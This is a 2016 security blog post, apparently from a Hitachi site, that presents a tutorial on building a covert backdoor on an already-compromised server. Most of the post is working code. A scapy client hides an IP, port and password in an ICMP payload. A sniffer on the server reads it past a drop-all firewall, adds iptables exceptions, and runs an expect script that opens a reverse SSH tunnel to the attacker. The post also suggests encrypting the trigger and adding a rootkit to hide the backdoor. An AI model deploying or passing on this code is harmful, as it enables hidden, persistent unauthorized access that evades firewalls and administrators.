Hitachi

U.S.A.

Hitachi Group Global Network

Americas

Asia

Europe

Middle East and Africa

Oceania

Close

How to Build a Simple Backdoor in 30 Lines of Code
You are here: Home \ Security Practices \ How to Build a Simple Backdoor in 30 Lines of Code
How to Build a Simple Backdoor
Posted on Tuesday, June 14th, 2016 by

How to Build a Simple Backdoor in 30 Lines of Code

 

Sometimes in the information security world, the simplest things work best. This is why I’d like to show you how to build a simple backdoor with a method for regaining access to the machine you have compromised.

Main Characteristics of Backdoors

  • We suppose that we have root access on a server to be able to implement our backdoor
  • A local firewall should drop all network flows
  • The backdoor should not be bound to a port
  • The code is very simple (less than 30 lines in total)

 

How it works

Let’s start with a schema:

How to Build a Simple Backdoor in 30 lines of Code

As you can see, the client will forge a specific packet with an ICMP load and the server will receive the packet even with a local firewall that drops everything. The listening mode allows the system to receive all packets going to the interface even if they are dropped by a firewall.

 

Let’s take a look at the code:

Client Side

This is just a script that takes the server IP as an input, the client IP (the one for reverse shell), the connection port and the password of the client machine that the server will use when establishing the reverse shell.

When the backdoor creates the reverse shell, it will generate a file in /tmp/ directory. This indicates that the reverse tunnel is working.

 

#! /usr/bin/env python

import logging

import socket

logging.getLogger("scapy.runtime").setLevel(logging.ERROR)

from scapy.all import *

import sys

import os.path

import time

 

file_result = "/tmp/done"

 

if len(sys.argv) != 5:

  print "Usage : " + " IP_SERVER " + " CLIENT_IP " + " PORT_SSH_CLIENT " + " PASSWORD_CLIENT "

  sys.exit(1)

server = sys.argv[1]

 

if os.path.isfile(file_result):

  os.remove(file_result)

 

load = sys.argv[2]+"|"+sys.argv[3]+"|"+sys.argv[4]

pingr = IP(dst=server)/ICMP()/load

send(pingr,verbose=0)

 

for i in xrange(10,0,-1):

    time.sleep(1)

    print str(i) + "..",

    sys.stdout.flush()

print

 

Server Side

The server side consists of two parts: the main script and the sshtunnel.sh.

 

1. Main script

This script will listen to ICMP packets and parse the load which is supposed to allow the IP address to connect, as well as the port and the password of the remote machine. Then this script will open two local firewall rules to be able to reach the client. Finally, the script will call an expect script that will create the tunnel.

#! /usr/bin/env python
import logging
import socket
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
from scapy.all import *
import subprocess

def icmp_monitor_callback(pkt):
  reg = re.compile("(.*)\|(.*)\|(.*)")
  g = reg.match(pkt.load)
  if g:
    subprocess.Popen(["/sbin/iptables", "-I", "INPUT", "1","-s",g.group(1),'-j','ACCEPT'])
    subprocess.Popen(["/sbin/iptables", "-I", "OUTPUT", "1","-d",g.group(1),'-j','ACCEPT'])
    p=subprocess.call(["/root/sshtunnel.sh", g.group(1),g.group(2),g.group(3)])
  return

sniff(prn=icmp_monitor_callback, filter="icmp", store=0)

2. sshtunnel.sh

This script takes the IP as parameter as well as the port and the password needed for a remote SSH connection. In fact, because SSH does not allow to enter passwords in the command line, we found a workaround by using this expect script.

#!/usr/bin/expect -f
set ip [lindex $argv 0];
set port [lindex $argv 1];
set password [lindex $argv 2];
spawn ssh  -o StrictHostKeyChecking=no -R 19999:localhost:$port $ip
expect "*?assword:*"
send "$password\r"
expect "*#"
send "touch /tmp/done\r"
interact

 

Simple isn’t it?

 

Next Steps

  • ICMP payload should be encrypted
  • Add other protocols to wake up the backdoor (http, special SYN packet, DNS, etc…)
  • Develop a rootkit able to hide the backdoor on CentOs system

 

If you are curious, here are some questions to let you think about this kind of simple backdoor:

  • What if this kind of backdoor is implemented on your adsl router?
  • What if this kind of backdoor is implemented on equipment using public IP facing?

 

Let me know your thoughts!

Avatar
About author:

Latest Webinars | Watch Now

 

The Next Generation of Managed Security, in collaboration with PCM.

Watch Now

Reporting Data Privacy Obligations to the Board: A Practical Approach to Ongoing Compliance, in collaboration with Nymity.

Watch Now